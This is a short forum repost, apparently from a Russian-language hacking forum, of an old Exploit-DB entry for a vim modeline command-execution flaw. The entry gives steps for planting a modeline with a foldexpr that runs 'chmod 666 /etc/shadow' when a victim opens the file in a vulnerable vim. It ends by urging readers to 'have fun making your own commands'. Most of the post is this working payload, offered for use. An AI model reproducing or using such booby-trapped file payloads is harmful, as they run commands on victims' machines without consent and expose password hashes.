Exploit vim 6.3 < 6.3.082 - 'modlines' Local Command Execution

Exploiter

Хакер
34,644
0
18 Дек 2022
EDB-ID
1119
Проверка EDB
  1. Пройдено
Автор
GEORGI GUNINSKI
Тип уязвимости
LOCAL
Платформа
MULTIPLE
CVE
N/A
Дата публикации
2005-07-25
Код:
1) open up a text file.

2) insert at the top the information (below).

/* vim: foldmethod=expr:foldexpr=glob("`chmod\ 666\ /etc/shadow`") */

3) if modlines = on anyone that opens the file with vim will execute the command:
   chmod 666 /etc/shadow
   
Have fun making your own commands.

The advisory can be found at:
  http://www.guninski.com/where_do_you_want_billg_to_go_today_5.html

/str0ke

# milw0rm.com [2005-07-25]
 
Источник
www.exploit-db.com

Похожие темы